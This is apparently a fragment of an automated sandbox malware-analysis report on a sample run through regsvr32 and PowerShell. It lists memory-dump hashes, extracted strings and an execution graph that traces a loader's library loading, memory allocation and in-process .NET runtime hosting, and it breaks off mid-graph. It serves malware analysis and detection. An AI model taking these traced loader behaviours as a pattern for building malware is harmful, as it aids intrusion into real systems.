                                                                              • Source File: 00000009.00000002.1165832120.00007FFD348E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFD348E0000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_7ffd348e0000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: Value
                                                                              • String ID:
                                                                              • API String ID: 3702945584-0
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1165832120.00007FFD348E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFD348E0000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_7ffd348e0000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: Value
                                                                              • String ID:
                                                                              • API String ID: 3702945584-0
                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.974753043.00007FFCF4550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4550000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_7ffcf4550000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 93cc8f335ea77d20812d5ea9461f9ac6aec4459bd542a99c5557b74203656af1
                                                                              • Instruction ID: 1d37947085c0d4154f38aba437763462b541bbafcecdac9b8bd6ecb43b8c0f78
                                                                              • Opcode Fuzzy Hash: 93cc8f335ea77d20812d5ea9461f9ac6aec4459bd542a99c5557b74203656af1
                                                                              • Instruction Fuzzy Hash: 89E14572E2DAD94FE356A7A898A5174BBE1EF46214B0901FFD09DC71D3DD18AC02C362
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.974753043.00007FFCF4550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4550000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_7ffcf4550000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: /
                                                                              • API String ID: 0-2043925204
                                                                              • Opcode ID: 96247af310dd38d54ca406f1a26fffcbe86576cb68099602d5c7d62887cf3c60
                                                                              • Instruction ID: 4c19f6004a5009295167b468e973e15a98afec1ce011c85ffe48ce694af0de7f
                                                                              • Opcode Fuzzy Hash: 96247af310dd38d54ca406f1a26fffcbe86576cb68099602d5c7d62887cf3c60
                                                                              • Instruction Fuzzy Hash: 9D121472E1EADD0FE756A7A888A51B5BFE1EF56218B0801FBD05CC71D3DA18AC05C361
                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.973730175.00007FFCF436D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF436D000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_7ffcf436d000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 946cb246357141a526ac434e353c5cf4bc440be6e80d338dc5fb3e9f95a162e4
                                                                              • Instruction ID: ba71097faeea852985d8d3980840a918b936a1989f78177ae80c565ce22f0778
                                                                              • Opcode Fuzzy Hash: 946cb246357141a526ac434e353c5cf4bc440be6e80d338dc5fb3e9f95a162e4
                                                                              • Instruction Fuzzy Hash: F141277140DBC84FE7568B28D8969623FB0EF93224B1505DFD089CB1A7D625A80AC7A2
                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.974279523.00007FFCF4480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4480000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_7ffcf4480000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: e50d1f1171438be1899588ea3d0314a26730022a7f177205d5948f215205fdb8
                                                                              • Instruction ID: 0558126f2bf10797729a6d017572ac81b096d99011d53ef10e36be2fa04eca77
                                                                              • Opcode Fuzzy Hash: e50d1f1171438be1899588ea3d0314a26730022a7f177205d5948f215205fdb8
                                                                              • Instruction Fuzzy Hash: 3F31287191CB4C8FDB08EF5CD8466E97BE0FB55311F04426FE449D3252CA206856CBC2
                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.974753043.00007FFCF4550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4550000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_7ffcf4550000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d6ca4f94c7fe744662c3299119e1a13acc3d0bf2c2019a3403f8997adf6d7b70
                                                                              • Instruction ID: 8dd507f2e2cc8709750b1656c6518f1fd17d4c397b50eb1b5cf8d015d52a3923
                                                                              • Opcode Fuzzy Hash: d6ca4f94c7fe744662c3299119e1a13acc3d0bf2c2019a3403f8997adf6d7b70
                                                                              • Instruction Fuzzy Hash: 0E311432E2DA2D0FE7A4A29894F1274B3D1EF44314B5901BED42EC72D2DE19EC01C6A1
                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.974279523.00007FFCF4480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4480000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_7ffcf4480000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: ad3cee754a812d5943ffaff087099766cd3e0166c32cd3854eef52dee7b466b9
                                                                              • Instruction ID: 1c462c96b3cea4532eee0842fd84d429bdb98e6b6c61e58b7aef80b5d8cf456b
                                                                              • Opcode Fuzzy Hash: ad3cee754a812d5943ffaff087099766cd3e0166c32cd3854eef52dee7b466b9
                                                                              • Instruction Fuzzy Hash: 9E21D43190CA0C8FDB58DF9CD84A7E97BE0EB95321F00812FD049D3155D670A456CB91
                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.974753043.00007FFCF4550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4550000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_7ffcf4550000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 3b763c228beca1a8892c0434ebaee1deb5c2f14d4ec4c5adcc78909afdb2e629
                                                                              • Instruction ID: abb1469e1d6cb564f7676506944eab289d0e7250fbfaa632540c549653b6128b
                                                                              • Opcode Fuzzy Hash: 3b763c228beca1a8892c0434ebaee1deb5c2f14d4ec4c5adcc78909afdb2e629
                                                                              • Instruction Fuzzy Hash: 5A112572E2E96D4FE7A9EA98D4A16B4A7E1EF4432470800F6E46DC74D3D908EC04C371
                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.974279523.00007FFCF4480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4480000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_7ffcf4480000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 0084200ad5dfc0514c9508e6661f314651b77e6dacee2883985d74b03d3c82f7
                                                                              • Instruction ID: 435f62c41692f6ef63476d6ed7c3a0cc16b842206ea4990033ac61aab6363bf3
                                                                              • Opcode Fuzzy Hash: 0084200ad5dfc0514c9508e6661f314651b77e6dacee2883985d74b03d3c82f7
                                                                              • Instruction Fuzzy Hash: 2801677121CB0C4FD744EF0CE451AA5B7E0FB95324F10066DE59AC3695D736E892CB45
                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.974279523.00007FFCF4480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4480000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_7ffcf4480000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: f3101a1244987c3f08fb529b2c5283d4ffa88c8e3cb6d8ea4f84e61c76d5f92a
                                                                              • Instruction ID: f3c0d7d76a8651854d7c29746144b52f002c13413f0abbd5b70767dc49267d17
                                                                              • Opcode Fuzzy Hash: f3101a1244987c3f08fb529b2c5283d4ffa88c8e3cb6d8ea4f84e61c76d5f92a
                                                                              • Instruction Fuzzy Hash: 04F02B3580C6CD8FDB05DF2488565D57FA0FF56215F0402D7E458C70A2DB649864CBE2
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.1159785359.00007FFCF4540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4540000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_7ffcf4540000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: /`/
                                                                              • API String ID: 0-3596768853
                                                                              • Opcode ID: 961c017abff879a8cc47a97f8a5b9107208d14c4394aa2dbe0b2e9ae6383f944
                                                                              • Instruction ID: eecbcfd37ea784002e9a5d75315bbcd201abc0ed81df5a32a57bfafaf11d2e8c
                                                                              • Opcode Fuzzy Hash: 961c017abff879a8cc47a97f8a5b9107208d14c4394aa2dbe0b2e9ae6383f944
                                                                              • Instruction Fuzzy Hash: 08823A32E4DAD90FE756A72898B51B4BFE1DF53210B0801FBD499CB0E7D918AC46D361
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.1159014064.00007FFCF4470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4470000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_7ffcf4470000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: e26f58428c96390e4aa493661441ee2b2a26111739fcb10bd357e666e059eac7
                                                                              • Instruction ID: 230af7951a94f369d4448b702c68d2587dd67fe914d415df81946f9b42e8cccd
                                                                              • Opcode Fuzzy Hash: e26f58428c96390e4aa493661441ee2b2a26111739fcb10bd357e666e059eac7
                                                                              • Instruction Fuzzy Hash: 6B115E2180E7C94FD7079B348CA54957FB0EE13200B0902DBD498DB0E3D619981EC7B2
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.1159785359.00007FFCF4540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4540000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_7ffcf4540000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: a9218fd711af6b4c9ba077e0513f4f6742e327f8f0d4160b198451464d82533f
                                                                              • Instruction ID: ac6b10091cb69519ec148879ec5e4ce118eb5354f967c7bfc708eb3a99a579b6
                                                                              • Opcode Fuzzy Hash: a9218fd711af6b4c9ba077e0513f4f6742e327f8f0d4160b198451464d82533f
                                                                              • Instruction Fuzzy Hash: E6514822A0EBDD4FE756A62C98B55B0BFD0DF56210B0801FFD099CB1E3D909AC45C7A2
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.1157903968.00007FFCF435D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF435D000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_7ffcf435d000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 17d6cee58277f8c6e501ddbf83341dd46fccca04a7bfe78c79c131d47807f691
                                                                              • Instruction ID: 00d632a14013fb39e28f0e3f7eca3501edfaae135e54d22c7635de0f18a9a9e3
                                                                              • Opcode Fuzzy Hash: 17d6cee58277f8c6e501ddbf83341dd46fccca04a7bfe78c79c131d47807f691
                                                                              • Instruction Fuzzy Hash: 20414A7180DBC84FE7568B28D8969623FB0EF52311B1505EFD098CB1E3D625A80AC7B2
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.1159014064.00007FFCF4470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4470000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_7ffcf4470000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 455eebe78243283bc0d9768ffb9ae93e265f5dac4159dfd690f1db5b4c984386
                                                                              • Instruction ID: 8c4b1baa999a84b76d990925568a1688caf194a1be1b8112a6e802bd30fdf931
                                                                              • Opcode Fuzzy Hash: 455eebe78243283bc0d9768ffb9ae93e265f5dac4159dfd690f1db5b4c984386
                                                                              • Instruction Fuzzy Hash: E831A23091CB4C9FDB58DB4CA84AAA97BE0FB98321F00422FE449D3251CB70A855CBC2
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.1159014064.00007FFCF4470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4470000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_7ffcf4470000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 83fe1fa37596edb110af291560ab19a7c97e2c87b618fa9b45e67497670b22a0
                                                                              • Instruction ID: 03a153af6c60966ea28af93c27e66c224be7d44c79bea2d4e7ca6cec92e846d4
                                                                              • Opcode Fuzzy Hash: 83fe1fa37596edb110af291560ab19a7c97e2c87b618fa9b45e67497670b22a0
                                                                              • Instruction Fuzzy Hash: 8921073190CB4C4FDB58DBACD84A7E97BE0EB96321F04426BD048D3156DA74A456CBA1
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.1159785359.00007FFCF4540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4540000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_7ffcf4540000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: eeb0137010b0f0e70fb5ffdc8a044b2358affd76689cd373a49d3c67f84513db
                                                                              • Instruction ID: 928d9c789c4ef630ac6ed14e320fa0d7d21c0a01b55db5810479b0ca089d142c
                                                                              • Opcode Fuzzy Hash: eeb0137010b0f0e70fb5ffdc8a044b2358affd76689cd373a49d3c67f84513db
                                                                              • Instruction Fuzzy Hash: 5D210532E4D9AE0FEBE5E61894F4174A6C2EF4621075900BAD46ECB1EACD18EC84D721
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.1159014064.00007FFCF4470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4470000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_7ffcf4470000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 84c9868c245e9965d099ea8104caf694c5afdfbdfb1d13a321a2bc1b95c95d71
                                                                              • Instruction ID: 646a5c1b2e5142aa08248c38a5781978eab19fb6adff28f1bb9c3f6f40872b1c
                                                                              • Opcode Fuzzy Hash: 84c9868c245e9965d099ea8104caf694c5afdfbdfb1d13a321a2bc1b95c95d71
                                                                              • Instruction Fuzzy Hash: 8421C87180C6DA4FDB069F649C554F57FB0EF12310B0941F6D458E70A3EA28646ACBA1
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.1159785359.00007FFCF4540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4540000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_7ffcf4540000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: c2ae493225547edf0ca2475e428c74c77635d79f439c2c74d8a448f4bd4c4259
                                                                              • Instruction ID: 8a73679918d8d28a2631a0e2b115092951b5a72d1ab695a759031c40ce071233
                                                                              • Opcode Fuzzy Hash: c2ae493225547edf0ca2475e428c74c77635d79f439c2c74d8a448f4bd4c4259
                                                                              • Instruction Fuzzy Hash: 71112333E4D9A94FE7A4E618D4B05B4A6E0EF4233070900B6E42DCB0EBD908AC80D261
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.1159014064.00007FFCF4470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4470000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_7ffcf4470000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: abec2792b95cc3134e75351a9277a07185e0420c5c5f3ff60835923a31afeda3
                                                                              • Instruction ID: b1a03e8b6453c95f5b7bd9d772587dd26bab7c8f1264d1f2da96ea4b7e3b30e6
                                                                              • Opcode Fuzzy Hash: abec2792b95cc3134e75351a9277a07185e0420c5c5f3ff60835923a31afeda3
                                                                              • Instruction Fuzzy Hash: 2C01A73021CB0C4FD748EF0CE451AA5B7E0FB95320F10062EE58AC3291D732E882CB41

                                                                              Execution Graph

                                                                              Execution Coverage:5%
                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                              Signature Coverage:0%
                                                                              Total number of Nodes:33
                                                                              Total number of Limit Nodes:7
                                                                              execution_graph
                                                                              • 99509 2f90014
                                                                              • 99510 2f90096
                                                                              • 99509->99510
                                                                              • 99511 2f9006a
                                                                              • 99509->99511
                                                                              • 99513 2fe0a56
                                                                              • 99511->99513
                                                                              • 99514 2feabec
                                                                              • 99513->99514
                                                                              • 99518 2fe0a6e
                                                                              • 99513->99518
                                                                              • 99514->99510
                                                                              • 99516 2fe0c88
                                                                              • 99516->99510
                                                                              • 99517 2fe0c9f LoadLibraryA
                                                                              • 99517->99518
                                                                              • 99518->99516
                                                                              • 99518->99517
                                                                              • 99519 2fe0d7c
                                                                              • 99518->99519
                                                                              • 99534 2fe0c9f
                                                                              • 99519->99534
                                                                              • 99522 2fe0c9f LoadLibraryA
                                                                              • 99523 2fe0db2
                                                                              • 99522->99523
                                                                              • 99524 2fe0c9f LoadLibraryA
                                                                              • 99523->99524
                                                                              • 99528 2fe0dc8
                                                                              • 99524->99528
                                                                              • 99527 2fe0c9f LoadLibraryA
                                                                              • 99527->99528
                                                                              • 99528->99527
                                                                              • 99530 2fe1358 VirtualAlloc
                                                                              • 99528->99530
                                                                              • 99531 2fe1daf
                                                                              • 99528->99531
                                                                              • 99538 2fe1dc7
                                                                              • 99528->99538
                                                                              • 99542 2fe5a20
                                                                              • 99528->99542
                                                                              • 99548 2fe32c3 LoadLibraryA
                                                                              • 99528->99548
                                                                              • 99549 2fe3426 LoadLibraryA
                                                                              • 99528->99549
                                                                              • 99550 2fe2f80 LoadLibraryA
                                                                              • 99528->99550
                                                                              • 99530->99528
                                                                              • 99531->99518
                                                                              • 99536 2fe0cd8
                                                                              • 99534->99536
                                                                              • 99535 2fe0d6d
                                                                              • 99535->99522
                                                                              • 99536->99535
                                                                              • 99551 2fe7a09 LoadLibraryA
                                                                              • 99536->99551
                                                                              • 99541 2fe1df9
                                                                              • 99538->99541
                                                                              • 99539 2fe20ce LoadLibraryA
                                                                              • 99539->99541
                                                                              • 99540 2fe2208
                                                                              • 99540->99528
                                                                              • 99541->99539
                                                                              • 99541->99540
                                                                              • 99546 2fe5ae6
                                                                              • 99542->99546
                                                                              • 99543 2fe5fa3 SafeArrayCreate
                                                                              • 99543->99546
                                                                              • 99544 2fe6107 SafeArrayDestroy
                                                                              • 99544->99546
                                                                              • 99545 2fe5f57 CLRCreateInstance
                                                                              • 99545->99546
                                                                              • 99546->99543
                                                                              • 99546->99544
                                                                              • 99546->99545
                                                                              • 99547 2fe6127
                                                                              • 99546->99547
                                                                              • 99547->99528
                                                                              • 99548->99528
                                                                              • 99549->99528
                                                                              • 99550->99528
                                                                              • 99551->99536
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2146891828.00007FFD348E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFD348E0000, based on PE: true
                                                                              • Associated: 0000000E.00000002.2146849088.00007FFD348E0000.00000002.00000001.01000000.00000009.sdmp
                                                                              • Associated: 0000000E.00000002.2147057606.00007FFD34995000.00000004.00000001.01000000.00000009.sdmp
                                                                              • Associated: 0000000E.00000002.2147102625.00007FFD34996000.00000002.00000001.01000000.00000009.sdmp
                                                                              • Associated: 0000000E.00000002.2147265617.00007FFD34A37000.00000004.00000001.01000000.00000009.sdmp
                                                                              • Associated: 0000000E.00000002.2147310142.00007FFD34A38000.00000002.00000001.01000000.00000009.sdmp
                                                                              • Associated: 0000000E.00000002.2147352056.00007FFD34A39000.00000004.00000001.01000000.00000009.sdmp
                                                                              • Associated: 0000000E.00000002.2147394662.00007FFD34A3A000.00000008.00000001.01000000.00000009.sdmp
                                                                              • Associated: 0000000E.00000002.2147437278.00007FFD34A3D000.00000002.00000001.01000000.00000009.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffd348e0000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: CloseHandle$EnvironmentErrorFreeLastStringsmemcpy
                                                                              • String ID: program path has no file name$#$*+-./:?@\_cmd.exe /e:ON /v:OFF /d /c "$.exeprogram not found$PATHstd\src\sys_common\process.rs$\?\\$\cmd.exemaximum number of ProcThreadAttributes exceeded$]?\\$assertion failed: is_code_point_boundary(self, new_len)$assertion failed: self.height > 0$exe\\.\NULexit code:
                                                                              • API String ID: 3975177916-1077193248
                                                                              • Opcode ID: 3cd8a189c29009ce87d5a1bd2db52f5fd8198f80c0cef3d0c1bf59600c9634fa
                                                                              • Instruction ID: c0d9193c338d548185e6e9524ad3a75a5092939457380aa21ebe2440b55b40d9
                                                                              • Opcode Fuzzy Hash: 3cd8a189c29009ce87d5a1bd2db52f5fd8198f80c0cef3d0c1bf59600c9634fa
                                                                              • Instruction Fuzzy Hash: BD739362B19AD184EB74CF25D8A43FA2361FB46789F44413ACF4D9BB89DF3C9641A310
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2146891828.00007FFD348E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFD348E0000, based on PE: true
                                                                              • Associated: 0000000E.00000002.2146849088.00007FFD348E0000.00000002.00000001.01000000.00000009.sdmp
                                                                              • Associated: 0000000E.00000002.2147057606.00007FFD34995000.00000004.00000001.01000000.00000009.sdmp
                                                                              • Associated: 0000000E.00000002.2147102625.00007FFD34996000.00000002.00000001.01000000.00000009.sdmp
                                                                              • Associated: 0000000E.00000002.2147265617.00007FFD34A37000.00000004.00000001.01000000.00000009.sdmp
                                                                              • Associated: 0000000E.00000002.2147310142.00007FFD34A38000.00000002.00000001.01000000.00000009.sdmp
                                                                              • Associated: 0000000E.00000002.2147352056.00007FFD34A39000.00000004.00000001.01000000.00000009.sdmp
                                                                              • Associated: 0000000E.00000002.2147394662.00007FFD34A3A000.00000008.00000001.01000000.00000009.sdmp
                                                                              • Associated: 0000000E.00000002.2147437278.00007FFD34A3D000.00000002.00000001.01000000.00000009.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffd348e0000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: CreateHeapmemcpy$AllocAttributesErrorFileLastMutex
                                                                              • String ID: $/i:S$SYNC$a Display implementation returned an error unexpectedly/rustc/f6e511eec7342f59a25f7c0534f1dbea00d01b14\library\alloc\src\string.rs
                                                                              • API String ID: 622075969-830671369
                                                                              • Opcode ID: 9e589264a15e699423857d24033ed33c06c5e3efbc52ea30a91c4a8dcb14a9f4
                                                                              • Instruction ID: 5569a01c6f991157a02261c07891e845f63c2a2d5909f9eedb4a0aa5fd731e4e
                                                                              • Opcode Fuzzy Hash: 9e589264a15e699423857d24033ed33c06c5e3efbc52ea30a91c4a8dcb14a9f4
                                                                              • Instruction Fuzzy Hash: B1F26172B0CAC280EA759B11E4907EBA361FB86780F444136DB8C87B9ADF7DD584DB50

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 3979 7ffd3493eff0-7ffd3493f058 call 7ffd34992a94 3982 7ffd3493f060-7ffd3493f072 GetCurrentProcessId 3979->3982 3983 7ffd3493f074 3982->3983 3984 7ffd3493f0a8-7ffd3493f127 call 7ffd34970bf0 3982->3984 3985 7ffd3493f080-7ffd3493f0a6 ProcessPrng 3983->3985 3988 7ffd3493f13e-7ffd3493f168 3984->3988 3989 7ffd3493f129-7ffd3493f139 call 7ffd348efe90 3984->3989 3985->3984 3985->3985 3991 7ffd3493f180-7ffd3493f19b 3988->3991 3992 7ffd3493f16a-7ffd3493f170 3988->3992 3989->3988 3993 7ffd3493f255-7ffd3493f275 call 7ffd348efe80 3991->3993 3994 7ffd3493f1a0-7ffd3493f1b1 3992->3994 3995 7ffd3493f172-7ffd3493f179 3992->3995 4007 7ffd3493f6c7-7ffd3493f6cf call 7ffd3496f690 3993->4007 4008 7ffd3493f27b-7ffd3493f295 3993->4008 3997 7ffd3493f1b3-7ffd3493f1c2 3994->3997 3998 7ffd3493f1f2-7ffd3493f1fa 3994->3998 3996 7ffd3493f1fd-7ffd3493f202 3995->3996 4002 7ffd3493f204-7ffd3493f244 3996->4002 4000 7ffd3493f1c8-7ffd3493f1eb 3997->4000 4001 7ffd3493f516-7ffd3493f528 3997->4001 3998->3996 4000->3996 4004 7ffd3493f1ed 4000->4004 4001->3996 4009 7ffd3493f52e-7ffd3493f557 4001->4009 4005 7ffd3493f6c4 4002->4005 4006 7ffd3493f24a-7ffd3493f251 4002->4006 4004->4009 4005->4007 4006->3993 4014 7ffd3493f6d4-7ffd3493f6dd 4007->4014 4011 7ffd3493f2b0-7ffd3493f2b3 4008->4011 4009->4002 4012 7ffd3493f310-7ffd3493f315 4011->4012 4013 7ffd3493f2b5-7ffd3493f2b8 4011->4013 4017 7ffd3493f470-7ffd3493f4b0 call 7ffd34992a24 4012->4017 4018 7ffd3493f31b-7ffd3493f32e 4012->4018 4015 7ffd3493f2f0-7ffd3493f2f4 4013->4015 4016 7ffd3493f2ba-7ffd3493f2bc 4013->4016 4019 7ffd3493f6df 4014->4019 4020 7ffd3493f702-7ffd3493f712 4014->4020 4015->4012 4023 7ffd3493f2f6-7ffd3493f2fd 4015->4023 4022 7ffd3493f2be-7ffd3493f2c1 4016->4022 4040 7ffd3493f5d0-7ffd3493f5d3 4017->4040 4041 7ffd3493f4b6-7ffd3493f4c1 GetLastError 4017->4041 4024 7ffd3493f3a0-7ffd3493f3a5 4018->4024 4025 7ffd3493f330-7ffd3493f337 4018->4025 4026 7ffd3493f72c-7ffd3493f78f call 7ffd34993140 ReadFileEx 4019->4026 4027 7ffd3493f71f-7ffd3493f722 4020->4027 4028 7ffd3493f714-7ffd3493f71a call 7ffd348efe90 4020->4028 4032 7ffd3493f2a0-7ffd3493f2a3 4022->4032 4033 7ffd3493f2c3-7ffd3493f2ee 4022->4033 4035 7ffd3493f303-7ffd3493f30a 4023->4035 4036 7ffd3493f3da-7ffd3493f3ea 4023->4036 4029 7ffd3493f2a5-7ffd3493f2ad 4024->4029 4037 7ffd3493f33d-7ffd3493f353 4025->4037 4038 7ffd3493f6a4 4025->4038 4050 7ffd3493f7d2-7ffd3493f7e1 GetLastError 4026->4050 4051 7ffd3493f791 4026->4051 4027->4026 4030 7ffd3493f724-7ffd3493f727 CloseHandle 4027->4030 4028->4027 4029->4011 4030->4026 4032->4029 4033->4025 4035->4022 4044 7ffd3493f427-7ffd3493f430 4036->4044 4045 7ffd3493f3ec-7ffd3493f3fc 4036->4045 4046 7ffd3493f355 4037->4046 4047 7ffd3493f35b-7ffd3493f35e 4037->4047 4043 7ffd3493f6b9-7ffd3493f6c2 call 7ffd3496f690 4038->4043 4053 7ffd3493f5d5-7ffd3493f5e4 call 7ffd348efe90 4040->4053 4054 7ffd3493f5e9-7ffd3493f642 call 7ffd34939060 4040->4054 4048 7ffd3493f4c7-7ffd3493f4ca 4041->4048 4049 7ffd3493f55c-7ffd3493f576 4041->4049 4043->4014 4056 7ffd3493f437-7ffd3493f446 4044->4056 4055 7ffd3493f3fe-7ffd3493f41e 4045->4055 4045->4056 4046->4047 4047->4038 4057 7ffd3493f364-7ffd3493f379 4047->4057 4058 7ffd3493f4e0-7ffd3493f4e3 4048->4058 4059 7ffd3493f4cc-7ffd3493f4d2 4048->4059 4068 7ffd3493f578-7ffd3493f587 call 7ffd348efe90 4049->4068 4069 7ffd3493f58c-7ffd3493f593 4049->4069 4065 7ffd3493f7e4-7ffd3493f7f0 4050->4065 4060 7ffd3493f7a0-7ffd3493f7b3 SleepEx 4051->4060 4053->4054 4078 7ffd3493f647-7ffd3493f64a 4054->4078 4063 7ffd3493f420 4055->4063 4064 7ffd3493f448-7ffd3493f465 4055->4064 4056->4063 4056->4064 4057->4043 4067 7ffd3493f37f-7ffd3493f38f 4057->4067 4058->4049 4074 7ffd3493f4e5-7ffd3493f4eb 4058->4074 4073 7ffd3493f4ed-7ffd3493f4f7 4059->4073 4060->4060 4075 7ffd3493f7b5-7ffd3493f7cc 4060->4075 4063->4044 